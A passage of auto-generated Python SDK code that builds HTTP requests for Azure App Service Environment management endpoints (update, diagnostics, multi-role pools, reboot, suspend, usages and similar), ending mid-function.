"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if force_delete is not None:
_params['forceDelete'] = _SERIALIZER.query("force_delete", force_delete, 'bool')
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="DELETE",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_update_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.AppServiceEnvironmentPatchResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_capacities_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/compute") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_vip_info_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/capacities/virtualip") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_change_vnet_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.VirtualNetworkProfile] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/changeVirtualNetwork") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_diagnostics_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_diagnostics_item_request(
resource_group_name: str,
name: str,
diagnostics_name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/diagnostics/{diagnosticsName}") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"diagnosticsName": _SERIALIZER.url("diagnostics_name", diagnostics_name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_inbound_network_dependencies_endpoints_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/inboundNetworkDependenciesEndpoints") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_pools_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_multi_role_pool_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_create_or_update_multi_role_pool_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_update_multi_role_pool_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
json: Optional[_models.WorkerPoolResource] = None,
content: Any = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
content_type = kwargs.pop('content_type', _headers.pop('Content-Type', None)) # type: Optional[str]
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
if content_type is not None:
_headers['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=_url,
params=_params,
headers=_headers,
json=json,
content=content,
**kwargs
)
def build_list_multi_role_pool_instance_metric_definitions_request(
resource_group_name: str,
name: str,
instance: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/instances/{instance}/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"instance": _SERIALIZER.url("instance", instance, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_metric_definitions_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/metricdefinitions") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_pool_skus_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/skus") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_multi_role_usages_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/multiRolePools/default/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_operations_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/operations") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_get_outbound_network_dependencies_endpoints_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/outboundNetworkDependenciesEndpoints") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_reboot_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/reboot") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_resume_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/resume") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_app_service_plans_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/serverfarms") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_web_apps_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
properties_to_include: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/sites") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if properties_to_include is not None:
_params['propertiesToInclude'] = _SERIALIZER.query("properties_to_include", properties_to_include, 'str')
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
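# Illustrative sketch (hypothetical values): optional keyword-only arguments
# such as ``properties_to_include`` are appended to the query string only when
# they are supplied.
def _example_list_web_apps_request() -> None:
    request = build_list_web_apps_request(
        resource_group_name="example-rg",
        name="example-ase",
        subscription_id="00000000-0000-0000-0000-000000000000",
        properties_to_include="SiteConfig",  # hypothetical property list
    )
    # GET .../sites?propertiesToInclude=SiteConfig&api-version=2019-08-01
    print(request.url)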
def build_suspend_request_initial(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/suspend") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
def build_list_usages_request(
resource_group_name: str,
name: str,
subscription_id: str,
*,
filter: Optional[str] = None,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
# Construct URL
_url = kwargs.pop("template_url", "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Web/hostingEnvironments/{name}/usages") # pylint: disable=line-too-long
path_format_arguments = {
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+[^\.]$'),
"name": _SERIALIZER.url("name", name, 'str'),
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
_url = _format_url_section(_url, **path_format_arguments)
# Construct parameters
if filter is not None:
_params['$filter'] = _SERIALIZER.query("filter", filter, 'str', skip_quote=True)
_params['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_headers['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_params,
headers=_headers,
**kwargs
)
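# Illustrative sketch (hypothetical filter): ``filter`` is serialized with
# skip_quote=True, so an OData expression passes through without additional
# URL quoting.
def _example_list_usages_request() -> None:
    request = build_list_usages_request(
        resource_group_name="example-rg",
        name="example-ase",
        subscription_id="00000000-0000-0000-0000-000000000000",
        filter="name.value eq 'CPU'",  # hypothetical OData filter
    )
    print(request.url)  # includes $filter=... and api-version=2019-08-01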
def build_list_worker_pools_request(
resource_group_name: str,
name: str,
subscription_id: str,
**kwargs: Any
) -> HttpRequest:
_headers = case_insensitive_dict(kwargs.pop("headers", {}) or {})
_params = case_insensitive_dict(kwargs.pop("params", {}) or {})
api_version = kwargs.pop('api_version', _params.pop('api-version', "2019-08-01")) # type: str
accept = _headers.pop('Accept', "application/json")
